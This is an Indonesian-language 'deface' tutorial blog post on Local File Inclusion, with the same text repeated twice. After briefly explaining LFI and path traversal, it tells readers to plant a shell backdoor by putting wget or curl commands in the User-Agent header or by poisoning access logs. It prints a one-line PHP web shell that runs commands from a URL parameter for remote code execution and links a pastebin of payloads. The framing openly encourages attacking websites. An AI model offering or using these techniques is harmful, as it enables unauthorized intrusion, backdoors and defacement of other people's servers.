Tutorial Deface 2021 Local File Inclusion - #1
Assalamualaikum Sahabat
Mengenai LFI atau kepanjangannya Local File Inclusion
Local File Inclusion (LFI) adalah kerentanan/vulnerability yang umum ditemukan pada aplikasi web. Kerentanan ini memungkinkan penyerang/attacker untuk menyertakan file lokal yang tersimpan di server agar dapat menjadi bagian dari proses eksekusi aplikasi.
Kerentanan Local File Inclusion (LFI) terjadi karena fungsi “include” pada aplikasi dapat dimanipulasi oleh pengguna/users melalui Input. Hal ini sebenarnya tidak akan menimbulkan permasalahan apabila input yang berasal dari pengguna dapat difilter atau disanitasi sebelum fungsi “include” memprosesnya.
File inclusion juga dapat terjadi pada fungsi aplikasi yang memproses file berdasarkan nama file yang diberikan oleh pengguna. Hal ini juga biasa disebut dengan kerentanan File path traversal. Input yang diberikan oleh pengguna bisa menggunakan link pada url atau melalui input box.
Sumber : https://harryadinanta.com/exploitasi/2014/08/08/Local-File-Inclusion
Contoh ?
Kalian juga bisa memanfaatkan bug ini untuk upload shell backdoor, dengan cara timbun useragent kalian dengan command wget maupun curl.
Kedua, dengan cara inject file access logs dengan kode" php yg berujung RCE
Example : <?php system ($_GET['cmd']);?>
Kek gtu, Payload ?
https://pastebin.com/raw/fGsDXSnZ
Oke, See u next post !
Good Luck !
Wassalamualaikum.
Mengenai LFI atau kepanjangannya Local File Inclusion
Local File Inclusion (LFI) adalah kerentanan/vulnerability yang umum ditemukan pada aplikasi web. Kerentanan ini memungkinkan penyerang/attacker untuk menyertakan file lokal yang tersimpan di server agar dapat menjadi bagian dari proses eksekusi aplikasi.
Kerentanan Local File Inclusion (LFI) terjadi karena fungsi “include” pada aplikasi dapat dimanipulasi oleh pengguna/users melalui Input. Hal ini sebenarnya tidak akan menimbulkan permasalahan apabila input yang berasal dari pengguna dapat difilter atau disanitasi sebelum fungsi “include” memprosesnya.
File inclusion juga dapat terjadi pada fungsi aplikasi yang memproses file berdasarkan nama file yang diberikan oleh pengguna. Hal ini juga biasa disebut dengan kerentanan File path traversal. Input yang diberikan oleh pengguna bisa menggunakan link pada url atau melalui input box.
Sumber : https://harryadinanta.com/exploitasi/2014/08/08/Local-File-Inclusion
Contoh ?
Kalian juga bisa memanfaatkan bug ini untuk upload shell backdoor, dengan cara timbun useragent kalian dengan command wget maupun curl.
Kedua, dengan cara inject file access logs dengan kode" php yg berujung RCE
Example : <?php system ($_GET['cmd']);?>
Kek gtu, Payload ?
https://pastebin.com/raw/fGsDXSnZ
Oke, See u next post !
Good Luck !
Wassalamualaikum.
